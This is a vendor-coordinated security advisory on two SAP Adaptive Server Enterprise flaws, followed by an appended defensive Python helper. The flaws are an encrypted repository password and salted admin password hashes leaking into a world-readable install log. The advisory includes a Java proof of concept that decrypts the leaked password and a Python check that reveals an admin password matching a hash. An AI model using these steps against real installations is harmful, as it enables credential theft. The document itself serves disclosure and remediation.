Trustwave SpiderLabs Security Advisory TWSL2020-006:
Multiple Vulnerabilities in SAP Adaptive Server Enterprise

Published: 09/24/2020
Version: 1.0

Vendor: SAP (www.sap.com)
Product: Adaptive Server Enterprise
Versions affected: prior to 16.0 SP02 PL09 HF2 and 16.0 SP03 PL08 HF2.
Product description: Relational database management system.


Finding 1: Information Disclosure in SAP Adaptive Server Enterprise
Credit: Martin Rakhmanov of Trustwave
CVE: CVE-2020-6295

On Windows the ASE_Suite.log file is readable by any valid Windows user by default:

C:\SAP>icacls C:\SAP\log\ASE_Suite.log
C:\SAP\log\ASE_Suite.log NT AUTHORITY\SYSTEM:(I)(F)
                         BUILTIN\Administrators:(I)(F)
                         BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

If the Cockpit component is installed, the log will contain the encrypted repository password:

DEBUG>>> 05-18-20 21:27:19 : ConfigCockpitLogins.writeRepositoryPassword(): write enRepoPwd=1-AAAAEgQQB+3Q7M42wx5KfB/vy2q4HfZhiEasqjA8vSjPIZbbLrqb9KZFqdpyTBHk7reqCIUzsXIlcMc/jaXtaW8eDvBIqQ==

This, together with weak permissions on the csibootstrap.properties and csikeystore.jceks files, allows password decryption by any valid Windows user.

C:\SAP>icacls C:\SAP\COCKPIT-4\conf\csibootstrap.properties
C:\SAP\COCKPIT-4\conf\csibootstrap.properties NT AUTHORITY\SYSTEM:(I)(F)
                                              BUILTIN\Administrators:(I)(F)
                                              BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

C:\SAP>icacls C:\SAP\COCKPIT-4\conf\csikeystore.jceks
C:\SAP\COCKPIT-4\conf\csikeystore.jceks NT AUTHORITY\SYSTEM:(I)(F)
                                        BUILTIN\Administrators:(I)(F)
                                        BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

POC in Java:

// javac.exe -cp . demo.java
// Copy original files from SAP location to MY_COPY location
// "C:\SAP\Shared\SAPJRE-8_1_060_64BIT\bin\java.exe" -Dcom.sybase.ua.home=C:\MY_COPY\COCKPIT-4\ -cp . demo
public class demo {
    public static void main(String[] args) throws Exception {
        com.sybase.ua.security.crypto.CSIEncryption.bootstrapCSI();
        String password = com.sybase.ua.security.crypto.CSIEncryption.getInstance()
                .getEncryptionTools()
                .decrypt("1-AAAAEgQQB+3Q7M42wx5KfB/vy2q4HfZhiEasqjA8vSjPIZbbLrqb9KZFqdpyTBHk7reqCIUzsXIlcMc/jaXtaW8eDvBIqQ==");
        System.out.println(password);
    }
}


Finding 2: Publicly readable ASE installation file contains SHA256 hashes of sccadmin and uafadmin passwords
Credit: Martin Rakhmanov of Trustwave
CVE: CVE-2020-6317

On Windows the ASE_Suite.log file is readable by any valid Windows user by default:

C:\SAP>icacls C:\SAP\log\ASE_Suite.log
C:\SAP\log\ASE_Suite.log NT AUTHORITY\SYSTEM:(I)(F)
                         BUILTIN\Administrators:(I)(F)
                         BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

If the Cockpit component is installed, the log will contain SHA-256 hashes of the special account passwords:

...
DEBUG>>> 05-18-20 21:27:18 : ConfigCockpitLogins.setCSIUserAndPassword(): write userName=sccadmin
DEBUG>>> 05-18-20 21:27:18 : ConfigCockpitLogins.setCSIUserAndPassword(): write encryptPwd={SHA-256:+EFnOPCybn0=}R2hjILOGw+9HuezqaOETTLEp3aES8tvgllXb8IL9W6E=
DEBUG>>> 05-18-20 21:27:18 : ConfigCockpitLogins.setCSIUserAndPassword(): write userName=uafadmin
DEBUG>>> 05-18-20 21:27:18 : ConfigCockpitLogins.setCSIUserAndPassword(): write encryptPwd={SHA-256:63brIY/QONU=}zmVB11zcCmEvCw/DGoEY01O4y3E0VkFjQwIizR2h6j4=
...

This allows brute force attacks on the accounts. The value is a salted SHA-256: the base64 string inside the braces is the salt, and the digest is SHA-256(salt || password).

Python (2.x) POC for the sccadmin encryptPwd:

>>> import hashlib, base64
>>> salt = base64.decodestring('+EFnOPCybn0=')
>>> hash = hashlib.sha256()
>>> hash.update(salt)
>>> hash.update('ASE8Magic!')
>>> base64.encodestring(hash.digest())
'R2hjILOGw+9HuezqaOETTLEp3aES8tvgllXb8IL9W6E=\n'


Remediation Steps:

Apply the latest vendor-supplied patches.

Finding 1 was fixed in SAP ASE 16.0 SP02 PL09 HF2 and 16.0 SP03 PL08 HF2.
Finding 2 was fixed in SAP ASE 15.7 SP 141 HF2, 15.7 SP 141 CE HF2, 16.0 SP02 PL09 HF2 and 16.0 SP03 PL08 HF2.


Revision History:

05/20/2020 - Vulnerability disclosed to vendor
07/08/2020 - Patch released by vendor for SAP ASE 16.0 for CVE-2020-6295 and CVE-2020-6317
07/15/2020 - Patch released by vendor for SAP ASE 15.7 for CVE-2020-6317
09/24/2020 - Advisory published


References:

1. https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552603345
2. https://launchpad.support.sap.com/#/notes/2953203


About Trustwave:

Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations, ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers, manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com


About Trustwave SpiderLabs:

SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services.

https://www.trustwave.com/spiderlabs


Disclaimer:

The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
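Appendix (added example, not part of the Trustwave advisory or of SAP's code): a small Python 3 helper for administrators cleaning up after the two findings above. It does two things. First, it scans ASE_Suite.log text for the ConfigCockpitLogins DEBUG entries that carry enRepoPwd= or encryptPwd= values, so an existing log can be checked for leaked material before it is scrubbed or its permissions are tightened. Second, it re-implements the {SHA-256:<base64 salt>}<base64 digest> check from the Finding 2 POC in Python 3 (the advisory's transcript is Python 2), so that after rotating the sccadmin and uafadmin passwords one can confirm that the new password no longer matches a record that was exposed. The regular expressions and the SAMPLE_LOG lines are constructed for this example from the log format quoted in the advisory; the icacls permission check itself remains a manual step on the Windows host.

```python
"""Helpers for the ASE_Suite.log credential leaks described in TWSL2020-006.

Added example, not Trustwave's or SAP's code. Regexes and sample data are
constructed from the log lines quoted in the advisory.
"""
import base64
import hashlib
import hmac
import re
from typing import List, Tuple

# Matches the ConfigCockpitLogins debug entries quoted in the advisory:
#   ...ConfigCockpitLogins.writeRepositoryPassword(): write enRepoPwd=<value>
#   ...ConfigCockpitLogins.setCSIUserAndPassword(): write encryptPwd=<value>
LEAK_RE = re.compile(
    r"ConfigCockpitLogins\.(writeRepositoryPassword|setCSIUserAndPassword)\(\):\s*"
    r"write (?P<key>enRepoPwd|encryptPwd|userName)=(?P<value>\S+)"
)

# Layout of the Finding 2 records: {SHA-256:<base64 salt>}<base64 digest>
SALTED_RE = re.compile(
    r"^\{SHA-256:(?P<salt>[A-Za-z0-9+/=]+)\}(?P<digest>[A-Za-z0-9+/=]+)$"
)

# Constructed sample excerpt in the advisory's layout; the secret values are made up.
SAMPLE_LOG = """\
DEBUG>>> 05-18-20 21:27:18 : ConfigCockpitLogins.setCSIUserAndPassword(): write userName=sccadmin
DEBUG>>> 05-18-20 21:27:18 : ConfigCockpitLogins.setCSIUserAndPassword(): write encryptPwd={SHA-256:AAAAAAAAAAA=}Zm9vYmFy
DEBUG>>> 05-18-20 21:27:19 : ConfigCockpitLogins.writeRepositoryPassword(): write enRepoPwd=1-EXAMPLEEXAMPLE==
INFO>>>  05-18-20 21:27:20 : Installer.step(): completed
"""


def find_credential_leaks(log_text: str) -> List[Tuple[str, str]]:
    """Return (key, value) for every secret-bearing ConfigCockpitLogins line.

    userName lines are recognised by the regex (useful context when reading the
    log by hand) but are not reported, since a user name is not a secret.
    """
    leaks = []
    for line in log_text.splitlines():
        m = LEAK_RE.search(line)
        if m and m.group("key") in ("enRepoPwd", "encryptPwd"):
            leaks.append((m.group("key"), m.group("value")))
    return leaks


def make_salted_record(password: str, salt: bytes) -> str:
    """Build a record in the log's layout: SHA-256(salt || password), both base64."""
    digest = hashlib.sha256(salt + password.encode("utf-8")).digest()
    return "{SHA-256:%s}%s" % (
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    )


def verify_salted_record(record: str, password: str) -> bool:
    """True if `password`, hashed with the record's salt, equals the record's digest."""
    m = SALTED_RE.match(record)
    if not m:
        raise ValueError("not a {SHA-256:salt}digest record")
    salt = base64.b64decode(m.group("salt"))
    expected = base64.b64decode(m.group("digest"))
    actual = hashlib.sha256(salt + password.encode("utf-8")).digest()
    # Constant-time comparison is not needed for an offline check, but it is the
    # right habit for anything that compares secrets.
    return hmac.compare_digest(actual, expected)


if __name__ == "__main__":
    for key, value in find_credential_leaks(SAMPLE_LOG):
        print("leaked %-10s %s" % (key, value))

    # The sccadmin record and password quoted in the advisory's Finding 2 transcript.
    advisory_record = "{SHA-256:+EFnOPCybn0=}R2hjILOGw+9HuezqaOETTLEp3aES8tvgllXb8IL9W6E="
    print("advisory record matches 'ASE8Magic!':",
          verify_salted_record(advisory_record, "ASE8Magic!"))
    # After a rotation, the new password must not verify against the old record.
    print("advisory record matches a rotated password:",
          verify_salted_record(advisory_record, "rotated-example-password"))
```

Run it against a real copy of ASE_Suite.log with `find_credential_leaks(open(path).read())`; any reported entry means the file should be scrubbed or removed and the corresponding password rotated, independently of applying the vendor patches.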